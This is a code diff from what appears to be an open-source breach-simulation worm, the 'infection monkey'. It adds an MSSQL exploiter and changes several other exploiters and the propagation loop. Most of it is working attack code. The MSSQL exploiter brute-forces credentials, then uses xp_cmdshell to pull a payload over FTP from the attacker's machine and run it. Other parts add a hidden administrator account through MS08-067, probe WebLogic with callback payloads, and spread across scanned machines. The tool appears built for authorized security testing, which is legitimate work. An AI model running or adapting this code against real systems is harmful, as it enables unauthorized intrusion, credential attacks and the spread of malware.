||||||
|
SQL_DEFAULT_TCP_PORT = '1433'
|
||||||
|
DEFAULT_PAYLOAD_PATH_WIN = os.path.expandvars(r'~PLD123.bat')
|
||||||
|
DEFAULT_PAYLOAD_PATH_LINUX = '~PLD123.bat'
|
||||||
|
|
||||||
|
def __init__(self, host):
|
||||||
|
super(MSSQLExploiter, self).__init__(host)
|
||||||
|
self.attacks_list = [mssqlexec_utils.CmdShellAttack]
|
||||||
|
|
||||||
|
def create_payload_file(self, payload_path):
|
||||||
|
"""
|
||||||
|
This function creates dynamically the payload file to be transported and ran on the exploited machine.
|
||||||
|
:param payload_path: A path to the create the payload file in
|
||||||
|
:return: True if the payload file was created and false otherwise.
|
||||||
|
"""
|
||||||
|
try:
|
||||||
|
with open(payload_path, 'w+') as payload_file:
|
||||||
|
payload_file.write('dir C:\\')
|
||||||
|
return True
|
||||||
|
except Exception as e:
|
||||||
|
LOG.error("Payload file couldn't be created", exc_info=True)
|
||||||
|
return False
|
||||||
|
|
||||||
|
def exploit_host(self):
|
||||||
|
"""
|
||||||
|
Main function of the mssql brute force
|
||||||
|
Return:
|
||||||
|
True or False depends on process success
|
||||||
|
"""
|
||||||
|
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
|
||||||
|
|
||||||
|
payload_path = MSSQLExploiter.DEFAULT_PAYLOAD_PATH_LINUX if 'linux' in self.host.os['type'] \
|
||||||
|
else MSSQLExploiter.DEFAULT_PAYLOAD_PATH_WIN
|
||||||
|
|
||||||
|
if not self.create_payload_file(payload_path):
|
||||||
|
return False
|
||||||
|
if self.brute_force_begin(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list,
|
||||||
|
payload_path):
|
||||||
|
LOG.debug("Bruteforce was a success on host: {0}".format(self.host.ip_addr))
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
LOG.error("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
|
||||||
|
return False
|
||||||
|
|
||||||
|
def handle_payload(self, cursor, payload):
|
||||||
|
"""
|
||||||
|
Handles the process of payload sending and execution, prepares the attack and details.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
cursor (pymssql.conn.cursor obj): A cursor of a connected pymssql.connect obj to user for commands.
|
||||||
|
payload (string): Payload path
|
||||||
|
|
||||||
|
Return:
|
||||||
|
True or False depends on process success
|
||||||
|
"""
|
||||||
|
|
||||||
|
chosen_attack = self.attacks_list[0](payload, cursor, self.host)
|
||||||
|
|
||||||
|
if chosen_attack.send_payload():
|
||||||
|
LOG.debug('Payload: {0} has been successfully sent to host'.format(payload))
|
||||||
|
if chosen_attack.execute_payload():
|
||||||
|
LOG.debug('Payload: {0} has been successfully executed on host'.format(payload))
|
||||||
|
chosen_attack.cleanup_files()
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
LOG.error("Payload: {0} couldn't be executed".format(payload))
|
||||||
|
else:
|
||||||
|
LOG.error("Payload: {0} couldn't be sent to host".format(payload))
|
||||||
|
|
||||||
|
chosen_attack.cleanup_files()
|
||||||
|
return False
|
||||||
|
|
||||||
|
def brute_force_begin(self, host, port, users_passwords_pairs_list, payload):
|
||||||
|
"""
|
||||||
|
Starts the brute force connection attempts and if needed then init the payload process.
|
||||||
|
Main loop starts here.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
host (str): Host ip address
|
||||||
|
port (str): Tcp port that the host listens to
|
||||||
|
payload (str): Local path to the payload
|
||||||
|
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce with
|
||||||
|
|
||||||
|
Return:
|
||||||
|
True or False depends if the whole bruteforce and attack process was completed successfully or not
|
||||||
|
"""
|
||||||
|
# Main loop
|
||||||
|
# Iterates on users list
|
||||||
|
for user, password in users_passwords_pairs_list:
|
||||||
|
try:
|
||||||
|
# Core steps
|
||||||
|
# Trying to connect
|
||||||
|
conn = pymssql.connect(host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT)
|
||||||
|
LOG.info('Successfully connected to host: {0}, '
|
||||||
|
'using user: {1}, password: {2}'.format(host, user, password))
|
||||||
|
self.report_login_attempt(True, user, password)
|
||||||
|
cursor = conn.cursor()
|
||||||
|
|
||||||
|
# Handles the payload and return True or False
|
||||||
|
if self.handle_payload(cursor, payload):
|
||||||
|
LOG.debug("Successfully sent and executed payload: {0} on host: {1}".format(payload, host))
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
LOG.warning("user: {0} and password: {1}, "
|
||||||
|
"was able to connect to host: {2} but couldn't handle payload: {3}"
|
||||||
|
.format(user, password, host, payload))
|
||||||
|
except pymssql.OperationalError:
|
||||||
|
# Combo didn't work, hopping to the next one
|
||||||
|
pass
|
||||||
|
|
||||||
|
LOG.warning('No user/password combo was able to connect to host: {0}:{1}, '
|
||||||
|
'aborting brute force'.format(host, port))
|
||||||
|
return False
|
|
@ -0,0 +1,208 @@
|
||||||
|
import os
|
||||||
|
import multiprocessing
|
||||||
|
import logging
|
||||||
|
|
||||||
|
import pymssql
|
||||||
|
|
||||||
|
from infection_monkey.exploit.tools import get_interface_to_target
|
||||||
|
from pyftpdlib.authorizers import DummyAuthorizer
|
||||||
|
from pyftpdlib.handlers import FTPHandler
|
||||||
|
from pyftpdlib.servers import FTPServer
|
||||||
|
from time import sleep
|
||||||
|
|
||||||
|
|
||||||
|
__author__ = 'Maor Rayzin'
|
||||||
|
|
||||||
|
|
||||||
|
FTP_SERVER_PORT = 1026
|
||||||
|
FTP_SERVER_ADDRESS = ''
|
||||||
|
FTP_SERVER_USER = 'brute'
|
||||||
|
FTP_SERVER_PASSWORD = 'force'
|
||||||
|
FTP_WORK_DIR_WINDOWS = os.path.expandvars(r'%TEMP%/')
|
||||||
|
FTP_WORK_DIR_LINUX = '/tmp/'
|
||||||
|
|
||||||
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class FTP(object):
|
||||||
|
|
||||||
|
"""Configures and establish an FTP server with default details.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
user (str): User for FTP server auth
|
||||||
|
password (str): Password for FTP server auth
|
||||||
|
working_dir (str): The local working dir to init the ftp server on.
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, host, user=FTP_SERVER_USER, password=FTP_SERVER_PASSWORD):
|
||||||
|
"""Look at class level docstring."""
|
||||||
|
self.dst_ip = host.ip_addr
|
||||||
|
self.user = user
|
||||||
|
self.password = password
|
||||||
|
self.working_dir = FTP_WORK_DIR_LINUX if 'linux' in host.os['type'] else FTP_WORK_DIR_WINDOWS
|
||||||
|
|
||||||
|
def run_server(self):
|
||||||
|
|
||||||
|
""" Configures and runs the ftp server to listen forever until stopped.
|
||||||
|
"""
|
||||||
|
|
||||||
|
# Defining an authorizer and configuring the ftp user
|
||||||
|
authorizer = DummyAuthorizer()
|
||||||
|
authorizer.add_user(self.user, self.password, self.working_dir, perm='elr')
|
||||||
|
|
||||||
|
# Normal ftp handler
|
||||||
|
handler = FTPHandler
|
||||||
|
handler.authorizer = authorizer
|
||||||
|
|
||||||
|
address = (get_interface_to_target(self.dst_ip), FTP_SERVER_PORT)
|
||||||
|
|
||||||
|
# Configuring the server using the address and handler. Global usage in stop_server thats why using self keyword
|
||||||
|
self.server = FTPServer(address, handler)
|
||||||
|
|
||||||
|
# Starting ftp server, this server has no auto stop or stop clause, and also, its blocking on use, thats why I
|
||||||
|
# multiproccess is being used here.
|
||||||
|
self.server.serve_forever()
|
||||||
|
|
||||||
|
def stop_server(self):
|
||||||
|
# Stops the FTP server and closing all connections.
|
||||||
|
self.server.close_all()
|
||||||
|
|
||||||
|
|
||||||
|
class AttackHost(object):
|
||||||
|
"""
|
||||||
|
This class acts as an interface for the attacking methods class
|
||||||
|
|
||||||
|
Args:
|
||||||
|
payload_path (str): The local path of the payload file
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, payload_path):
|
||||||
|
self.payload_path = payload_path
|
||||||
|
|
||||||
|
def send_payload(self):
|
||||||
|
raise NotImplementedError("Send function not implemented")
|
||||||
|
|
||||||
|
def execute_payload(self):
|
||||||
|
raise NotImplementedError("execute function not implemented")
|
||||||
|
|
||||||
|
|
||||||
|
class CmdShellAttack(AttackHost):
|
||||||
|
|
||||||
|
"""
|
||||||
|
This class uses the xp_cmdshell command execution and will work only if its available on the remote host.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
payload_path (str): The local path of the payload file
|
||||||
|
cursor (pymssql.conn.obj): A cursor object from pymssql.connect to run commands with.
|
||||||
|
host (model.host.VictimHost): Host this attack is going to target
|
||||||
|
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, payload_path, cursor, host):
|
||||||
|
super(CmdShellAttack, self).__init__(payload_path)
|
||||||
|
self.ftp_server, self.ftp_server_p = self.__init_ftp_server(host)
|
||||||
|
self.cursor = cursor
|
||||||
|
self.attacker_ip = get_interface_to_target(host.ip_addr)
|
||||||
|
|
||||||
|
def send_payload(self):
|
||||||
|
"""
|
||||||
|
Sets up an FTP server and using it to download the payload to the remote host
|
||||||
|
|
||||||
|
Return:
|
||||||
|
True if payload sent False if not.
|
||||||
|
"""
|
||||||
|
|
||||||
|
# Sets up the cmds to run
|
||||||
|
shellcmd1 = """xp_cmdshell "mkdir c:\\tmp& chdir c:\\tmp& echo open {0} {1}>ftp.txt& \
|
||||||
|
echo {2}>>ftp.txt" """.format(self.attacker_ip, FTP_SERVER_PORT, FTP_SERVER_USER)
|
||||||
|
shellcmd2 = """xp_cmdshell "chdir c:\\tmp& echo {0}>>ftp.txt" """.format(FTP_SERVER_PASSWORD)
|
||||||
|
shellcmd3 = """xp_cmdshell "chdir c:\\tmp& echo get {0}>>ftp.txt& echo bye>>ftp.txt" """\
|
||||||
|
.format(self.payload_path)
|
||||||
|
shellcmd4 = """xp_cmdshell "chdir c:\\tmp& cmd /c ftp -s:ftp.txt" """
|
||||||
|
shellcmds = [shellcmd1, shellcmd2, shellcmd3, shellcmd4]
|
||||||
|
|
||||||
|
# Checking to see if ftp server is up
|
||||||
|
if self.ftp_server_p and self.ftp_server:
|
||||||
|
try:
|
||||||
|
# Running the cmd on remote host
|
||||||
|
for cmd in shellcmds:
|
||||||
|
self.cursor.execute(cmd)
|
||||||
|
sleep(0.5)
|
||||||
|
except Exception as e:
|
||||||
|
LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
|
||||||
|
self.ftp_server_p.terminate()
|
||||||
|
return False
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
LOG.error("Couldn't establish an FTP server for the dropout")
|
||||||
|
return False
|
||||||
|
|
||||||
|
def execute_payload(self):
|
||||||
|
|
||||||
|
"""
|
||||||
|
Executes the payload after ftp drop
|
||||||
|
|
||||||
|
Return:
|
||||||
|
True if payload was executed successfully, False if not.
|
||||||
|
"""
|
||||||
|
|
||||||
|
# Getting the payload's file name
|
||||||
|
payload_file_name = os.path.split(self.payload_path)[1]
|
||||||
|
|
||||||
|
# Preparing the cmd to run on remote, using no_output so I can capture exit code: 0 -> success, 1 -> error.
|
||||||
|
shellcmd = """DECLARE @i INT \
|
||||||
|
EXEC @i=xp_cmdshell "chdir C:\\& C:\\tmp\\{0}", no_output \
|
||||||
|
SELECT @i """.format(payload_file_name)
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Executing payload on remote host
|
||||||
|
LOG.debug('Starting execution process of payload: {0} on remote host'.format(payload_file_name))
|
||||||
|
self.cursor.execute(shellcmd)
|
||||||
|
if self.cursor.fetchall()[0][0] == 0:
|
||||||
|
# Success
|
||||||
|
self.ftp_server_p.terminate()
|
||||||
|
LOG.debug('Payload: {0} execution on remote host was a success'.format(payload_file_name))
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
LOG.warning('Payload: {0} execution on remote host failed'.format(payload_file_name))
|
||||||
|
self.ftp_server_p.terminate()
|
||||||
|
return False
|
||||||
|
|
||||||
|
except pymssql.OperationalError as e:
|
||||||
|
LOG.error('Executing payload: {0} failed'.format(payload_file_name), exc_info=True)
|
||||||
|
self.ftp_server_p.terminate()
|
||||||
|
return False
|
||||||
|
|
||||||
|
def cleanup_files(self):
|
||||||
|
"""
|
||||||
|
Cleans up the folder with the attack related files (C:\\tmp by default)
|
||||||
|
:return: True or False if command executed or not.
|
||||||
|
"""
|
||||||
|
cleanup_command = """xp_cmdshell "rd /s /q c:\\tmp" """
|
||||||
|
try:
|
||||||
|
self.cursor.execute(cleanup_command)
|
||||||
|
LOG.info('Attack files cleanup command has been sent.')
|
||||||
|
return True
|
||||||
|
except Exception as e:
|
||||||
|
LOG.error('Error cleaning the attack files using xp_cmdshell, files may remain on host', exc_info=True)
|
||||||
|
return False
|
||||||
|
|
||||||
|
def __init_ftp_server(self, host):
|
||||||
|
"""
|
||||||
|
Init an FTP server using FTP class on a different process
|
||||||
|
|
||||||
|
Return:
|
||||||
|
ftp_s: FTP server object
|
||||||
|
p: the process obj of the FTP object
|
||||||
|
"""
|
||||||
|
|
||||||
|
try:
|
||||||
|
ftp_s = FTP(host)
|
||||||
|
multiprocessing.log_to_stderr(logging.DEBUG)
|
||||||
|
p = multiprocessing.Process(target=ftp_s.run_server)
|
||||||
|
p.start()
|
||||||
|
LOG.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name))
|
||||||
|
return ftp_s, p
|
||||||
|
except Exception as e:
|
||||||
|
LOG.error('Exception raised while trying to pull up the ftp server', exc_info=True)
|
||||||
|
return None, None
|
|
@@ -16,6 +16,7 @@ from infection_monkey.model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
 from infection_monkey.network.tools import check_tcp_port
 from infection_monkey.exploit.tools import build_monkey_commandline
 from infection_monkey.utils import utf_to_ascii
+from common.utils.exploit_enum import ExploitType
 
 __author__ = 'hoffer'
 
@@ -235,6 +236,7 @@ class CMDClientFactory(rdp.ClientFactory):
 class RdpExploiter(HostExploiter):
 
     _TARGET_OS_TYPE = ['windows']
+    EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
 
     def __init__(self, host):
         super(RdpExploiter, self).__init__(host)
@@ -7,6 +7,7 @@ from io import BytesIO
 from os import path
 
 import impacket.smbconnection
+from impacket.nmb import NetBIOSError
 from impacket.nt_errors import STATUS_SUCCESS
 from impacket.smb import FILE_OPEN, SMB_DIALECT, SMB, SMBCommand, SMBNtCreateAndX_Parameters, SMBNtCreateAndX_Data, \
     FILE_READ_DATA, FILE_SHARE_READ, FILE_NON_DIRECTORY_FILE, FILE_WRITE_DATA, FILE_DIRECTORY_FILE
@@ -172,7 +173,7 @@ class SambaCryExploiter(HostExploiter):
                 if self.is_share_writable(smb_client, share):
                     writable_shares_creds_dict[share] = credentials
 
-            except (impacket.smbconnection.SessionError, SessionError):
+            except (impacket.smbconnection.SessionError, SessionError, NetBIOSError):
                 # If failed using some credentials, try others.
                 pass
 
@@ -9,12 +9,14 @@ from infection_monkey.model import MONKEY_CMDLINE_DETACHED_WINDOWS, DROPPER_CMDL
 from infection_monkey.network import SMBFinger
 from infection_monkey.network.tools import check_tcp_port
 from infection_monkey.exploit.tools import build_monkey_commandline
+from common.utils.exploit_enum import ExploitType

 LOG = getLogger(__name__)


 class SmbExploiter(HostExploiter):
     _TARGET_OS_TYPE = ['windows']
+    EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
     KNOWN_PROTOCOLS = {
         '139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139),
         '445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445),
@@ -10,6 +10,7 @@ from infection_monkey.exploit.tools import get_target_monkey, get_monkey_depth
 from infection_monkey.model import MONKEY_ARG
 from infection_monkey.network.tools import check_tcp_port
 from infection_monkey.exploit.tools import build_monkey_commandline
+from common.utils.exploit_enum import ExploitType

 __author__ = 'hoffer'

@@ -20,6 +21,7 @@ TRANSFER_UPDATE_RATE = 15

 class SSHExploiter(HostExploiter):
     _TARGET_OS_TYPE = ['linux', None]
+    EXPLOIT_TYPE = ExploitType.BRUTE_FORCE

     def __init__(self, host):
         super(SSHExploiter, self).__init__(host)
@@ -54,7 +54,7 @@ class WebRCE(HostExploiter):
         exploit_config['upload_commands'] = None

         # url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
-        exploit_config['url_extensions'] = None
+        exploit_config['url_extensions'] = []

         # stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
         exploit_config['stop_checking_urls'] = False
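For readers following the WebRCE changes, the configuration dictionary assembled here ends up shaped roughly as below; the literal dict is an illustration built from the keys visible in this hunk, not a quote of the full method:

    # Illustrative shape of the defaults set by the WebRCE exploit configuration
    exploit_config = {
        'upload_commands': None,        # fall back to the default upload commands
        'url_extensions': [],           # subdirectories to scan, e.g. ["home", "index.php"]
        'stop_checking_urls': False,    # keep probing URLs after the first vulnerable one
    }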
@@ -13,14 +13,17 @@ from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer

 import threading
 import logging
+import time

 __author__ = "VakarisZ"

 LOG = logging.getLogger(__name__)
 # How long server waits for get request in seconds
 SERVER_TIMEOUT = 4
-# How long to wait for a request to go to vuln machine and then to our server from there. In seconds
-REQUEST_TIMEOUT = 2
+# How long should be wait after each request in seconds
+REQUEST_DELAY = 0.0001
+# How long to wait for a sign(request from host) that server is vulnerable. In seconds
+REQUEST_TIMEOUT = 5
 # How long to wait for response in exploitation. In seconds
 EXECUTION_TIMEOUT = 15
 URLS = ["/wls-wsat/CoordinatorPortType",

@@ -66,18 +69,41 @@ class WebLogicExploiter(WebRCE):
             print(e)
             return True

-    def check_if_exploitable(self, url):
+    def add_vulnerable_urls(self, urls, stop_checking=False):
+        """
+        Overrides parent method to use listener server
+        """
         # Server might get response faster than it starts listening to it, we need a lock
         httpd, lock = self._start_http_server()
-        payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port)
+        exploitable = False
+
+        for url in urls:
+            if self.check_if_exploitable_weblogic(url, httpd):
+                exploitable = True
+                break
+
+        if not exploitable and httpd.get_requests < 1:
+            # Wait for responses
+            time.sleep(REQUEST_TIMEOUT)
+
+        if httpd.get_requests > 0:
+            # Add all urls because we don't know which one is vulnerable
+            self.vulnerable_urls.extend(urls)
+            self._exploit_info['vulnerable_urls'] = self.vulnerable_urls
+        else:
+            LOG.info("No vulnerable urls found, skipping.")
+
+        self._stop_http_server(httpd, lock)
+
+    def check_if_exploitable_weblogic(self, url, httpd):
+        payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port)
         try:
-            post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
+            post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
         except exceptions.ReadTimeout:
-            # Our request does not get response thus we get ReadTimeout error
+            # Our request will not get response thus we get ReadTimeout error
             pass
         except Exception as e:
             LOG.error("Something went wrong: %s" % e)
-            self._stop_http_server(httpd, lock)
         return httpd.get_requests > 0

     def _start_http_server(self):

@@ -94,7 +120,8 @@ class WebLogicExploiter(WebRCE):
         lock.acquire()
         return httpd, lock

-    def _stop_http_server(self, httpd, lock):
+    @staticmethod
+    def _stop_http_server(httpd, lock):
         lock.release()
         httpd.join(SERVER_TIMEOUT)
         httpd.stop()

@@ -168,8 +195,8 @@ class WebLogicExploiter(WebRCE):
     we determine if we can exploit by either getting a GET request from host or not.
     """
     def __init__(self, local_ip, local_port, lock, max_requests=1):
-        self._local_ip = local_ip
-        self._local_port = local_port
+        self.local_ip = local_ip
+        self.local_port = local_port
         self.get_requests = 0
         self.max_requests = max_requests
         self._stopped = False

@@ -184,7 +211,7 @@ class WebLogicExploiter(WebRCE):
                 LOG.info('Server received a request from vulnerable machine')
                 self.get_requests += 1
                 LOG.info('Server waiting for exploited machine request...')
-        httpd = HTTPServer((self._local_ip, self._local_port), S)
+        httpd = HTTPServer((self.local_ip, self.local_port), S)
         httpd.daemon = True
         self.lock.release()
         while not self._stopped and self.get_requests < self.max_requests:
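The WebLogic check above works by sending a test payload that makes the target call back to a short-lived HTTP server run by the monkey; any GET request received means the host is exploitable. A standalone sketch of that callback counter, using only the Python 2 standard library (the port and timing values are illustrative, not the exploiter's own):

    import time
    from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer

    hits = {'count': 0}

    class _Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            # Every GET from the target counts as evidence of exploitability
            hits['count'] += 1
            self.send_response(200)
            self.end_headers()

    def listen_briefly(ip='0.0.0.0', port=8000, seconds=5):
        httpd = HTTPServer((ip, port), _Handler)
        httpd.timeout = 1                       # handle_request() returns after at most 1s
        deadline = time.time() + seconds
        while time.time() < deadline and hits['count'] == 0:
            httpd.handle_request()              # serves at most one request per call
        return hits['count'] > 0                # True means the payload called back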
@@ -192,9 +192,9 @@ class Ms08_067_Exploiter(HostExploiter):

             sock.send("cmd /c (net user %s %s /add) &&"
                       " (net localgroup administrators %s /add)\r\n" %
-                      (self._config.ms08_067_remote_user_add,
-                       self._config.ms08_067_remote_user_pass,
-                       self._config.ms08_067_remote_user_add))
+                      (self._config.user_to_add,
+                       self._config.remote_user_pass,
+                       self._config.user_to_add))
             time.sleep(2)
             reply = sock.recv(1000)

@@ -213,8 +213,8 @@ class Ms08_067_Exploiter(HostExploiter):
         remote_full_path = SmbTools.copy_file(self.host,
                                               src_path,
                                               self._config.dropper_target_path_win_32,
-                                              self._config.ms08_067_remote_user_add,
-                                              self._config.ms08_067_remote_user_pass)
+                                              self._config.user_to_add,
+                                              self._config.remote_user_pass)

         if not remote_full_path:
             # try other passwords for administrator

@@ -240,7 +240,7 @@ class Ms08_067_Exploiter(HostExploiter):

         try:
             sock.send("start %s\r\n" % (cmdline,))
-            sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add,))
+            sock.send("net user %s /delete\r\n" % (self._config.user_to_add,))
         except Exception as exc:
             LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
             return False
@@ -9,12 +9,14 @@ from infection_monkey.exploit import HostExploiter
 from infection_monkey.exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey, \
     get_monkey_depth, build_monkey_commandline
 from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
+from common.utils.exploit_enum import ExploitType

 LOG = logging.getLogger(__name__)


 class WmiExploiter(HostExploiter):
     _TARGET_OS_TYPE = ['windows']
+    EXPLOIT_TYPE = ExploitType.BRUTE_FORCE

     def __init__(self, host):
         super(WmiExploiter, self).__init__(host)
@@ -13,6 +13,7 @@ from infection_monkey.config import WormConfiguration, EXTERNAL_CONFIG_FILE
 from infection_monkey.dropper import MonkeyDrops
 from infection_monkey.model import MONKEY_ARG, DROPPER_ARG
 from infection_monkey.monkey import InfectionMonkey
+import infection_monkey.post_breach  # dummy import for pyinstaller

 __author__ = 'itamar'

@@ -21,7 +22,7 @@ LOG = None
 LOG_CONFIG = {'version': 1,
               'disable_existing_loggers': False,
               'formatters': {'standard': {
-                  'format': '%(asctime)s [%(process)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s'},
+                  'format': '%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s'},
               },
               'handlers': {'console': {'class': 'logging.StreamHandler',
                                        'level': 'DEBUG',
@@ -24,6 +24,8 @@ CHMOD_MONKEY = "chmod +x %(monkey_path)s"
 RUN_MONKEY = " %(monkey_path)s %(monkey_type)s %(parameters)s"
 # Commands used to check for architecture and if machine is exploitable
 CHECK_COMMAND = "echo %s" % ID_STRING
+# CMD prefix for windows commands
+CMD_PREFIX = "cmd.exe /c"
 # Architecture checking commands
 GET_ARCH_WINDOWS = "wmic os get osarchitecture"
 GET_ARCH_LINUX = "lscpu"
@@ -2,8 +2,9 @@ __author__ = 'itamar'


 class VictimHost(object):
-    def __init__(self, ip_addr):
+    def __init__(self, ip_addr, domain_name=''):
         self.ip_addr = ip_addr
+        self.domain_name = str(domain_name)
         self.os = {}
         self.services = {}
         self.monkey_exe = None
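A quick usage sketch of the widened constructor (assuming the infection_monkey package is importable); existing call sites are unaffected because domain_name defaults to an empty string:

    from infection_monkey.model import VictimHost

    victim = VictimHost('10.0.0.5', domain_name='corp.local')    # values are illustrative
    print("%s / %s" % (victim.ip_addr, victim.domain_name))      # -> 10.0.0.5 / corp.local
    legacy = VictimHost('10.0.0.6')                              # legacy call: domain_name == ''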
@@ -1,32 +0,0 @@
-# -*- mode: python -*-
-
-block_cipher = None
-
-
-a = Analysis(['main.py'],
-             pathex=['..'],
-             binaries=None,
-             datas=None,
-             hiddenimports=['_cffi_backend'],
-             hookspath=None,
-             runtime_hooks=None,
-             excludes=None,
-             win_no_prefer_redirects=None,
-             win_private_assemblies=None,
-             cipher=block_cipher)
-
-a.binaries += [('sc_monkey_runner32.so', './bin/sc_monkey_runner32.so', 'BINARY')]
-a.binaries += [('sc_monkey_runner64.so', './bin/sc_monkey_runner64.so', 'BINARY')]
-
-pyz = PYZ(a.pure, a.zipped_data,
-          cipher=block_cipher)
-exe = EXE(pyz,
-          a.scripts,
-          a.binaries,
-          a.zipfiles,
-          a.datas,
-          name='monkey',
-          debug=False,
-          strip=True,
-          upx=True,
-          console=True )
@@ -16,6 +16,9 @@ from infection_monkey.network.network_scanner import NetworkScanner
 from infection_monkey.system_info import SystemInfoCollector
 from infection_monkey.system_singleton import SystemSingleton
 from infection_monkey.windows_upgrader import WindowsUpgrader
+from infection_monkey.post_breach.post_breach_handler import PostBreach
+from common.utils.attack_status_enum import ScanStatus
+from infection_monkey.transport.attack_telems.victim_host_telem import VictimHostTelem

 __author__ = 'itamar'

@@ -76,6 +79,9 @@ class InfectionMonkey(object):
             LOG.info("Monkey couldn't find server. Going down.")
             return

+        # Create a dir for monkey files if there isn't one
+        utils.create_monkey_dir()
+
         if WindowsUpgrader.should_upgrade():
             self._upgrading_to_64 = True
             self._singleton.unlock()

@@ -109,6 +115,12 @@ class InfectionMonkey(object):
             system_info = system_info_collector.get_info()
             ControlClient.send_telemetry("system_info_collection", system_info)

+            for action_class in WormConfiguration.post_breach_actions:
+                action = action_class()
+                action.act()
+
+            PostBreach().execute()
+
         if 0 == WormConfiguration.depth:
             LOG.debug("Reached max depth, shutting down")
             ControlClient.send_telemetry("trace", "Reached max depth, shutting down")

@@ -120,9 +132,6 @@ class InfectionMonkey(object):
             ControlClient.keepalive()
             ControlClient.load_control_config()

-            LOG.debug("Users to try: %s" % str(WormConfiguration.exploit_user_list))
-            LOG.debug("Passwords to try: %s" % str(WormConfiguration.exploit_password_list))
-
             self._network.initialize()

             self._exploiters = WormConfiguration.exploiter_classes

@@ -132,8 +141,7 @@ class InfectionMonkey(object):
             if not self._keep_running or not WormConfiguration.alive:
                 break

-            machines = self._network.get_victim_machines(WormConfiguration.scanner_class,
-                                                         max_find=WormConfiguration.victims_max_find,
+            machines = self._network.get_victim_machines(max_find=WormConfiguration.victims_max_find,
                                                          stop_callback=ControlClient.check_for_stop)
             is_empty = True
             for machine in machines:

@@ -147,7 +155,7 @@ class InfectionMonkey(object):
                     finger.get_host_fingerprint(machine)

                 ControlClient.send_telemetry('scan', {'machine': machine.as_dict(),
-                                                      'scanner': WormConfiguration.scanner_class.__name__})
+                                                      })

                 # skip machines that we've already exploited
                 if machine in self._exploited_machines:

@@ -167,44 +175,19 @@ class InfectionMonkey(object):
                     LOG.debug("Default server: %s set to machine: %r" % (self._default_server, machine))
                     machine.set_default_server(self._default_server)

-                successful_exploiter = None
+                # Order exploits according to their type
+                self._exploiters = sorted(self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value)
+                host_exploited = False
                 for exploiter in [exploiter(machine) for exploiter in self._exploiters]:
-                    if not exploiter.is_os_supported():
-                        LOG.info("Skipping exploiter %s host:%r, os is not supported",
-                                 exploiter.__class__.__name__, machine)
-                        continue
-
-                    LOG.info("Trying to exploit %r with exploiter %s...", machine, exploiter.__class__.__name__)
-
-                    result = False
-                    try:
-                        result = exploiter.exploit_host()
-                        if result:
-                            successful_exploiter = exploiter
-                            break
-                        else:
-                            LOG.info("Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__)
-
-                    except Exception as exc:
-                        LOG.exception("Exception while attacking %s using %s: %s",
-                                      machine, exploiter.__class__.__name__, exc)
-                    finally:
-                        exploiter.send_exploit_telemetry(result)
-
-                if successful_exploiter:
-                    self._exploited_machines.add(machine)
-
-                    LOG.info("Successfully propagated to %s using %s",
-                             machine, successful_exploiter.__class__.__name__)
-
-                    # check if max-exploitation limit is reached
-                    if WormConfiguration.victims_max_exploit <= len(self._exploited_machines):
-                        self._keep_running = False
-
-                        LOG.info("Max exploited victims reached (%d)", WormConfiguration.victims_max_exploit)
+                    if self.try_exploiting(machine, exploiter):
+                        host_exploited = True
+                        VictimHostTelem('T1210', ScanStatus.USED.value, machine=machine).send()
                         break
-                else:
+                if not host_exploited:
                     self._fail_exploitation_machines.add(machine)
+                    VictimHostTelem('T1210', ScanStatus.SCANNED.value, machine=machine).send()
+                if not self._keep_running:
+                    break

             if (not is_empty) and (WormConfiguration.max_iterations > iteration_index + 1):
                 time_to_sleep = WormConfiguration.timeout_between_iterations

@@ -242,6 +225,7 @@ class InfectionMonkey(object):
             self.send_log()
             self._singleton.unlock()

+        utils.remove_monkey_dir()
         InfectionMonkey.self_delete()
         LOG.info("Monkey is shutting down")

@@ -279,3 +263,50 @@ class InfectionMonkey(object):
             log = ''

         ControlClient.send_log(log)
+
+    def try_exploiting(self, machine, exploiter):
+        """
+        Workflow of exploiting one machine with one exploiter
+        :param machine: Machine monkey tries to exploit
+        :param exploiter: Exploiter to use on that machine
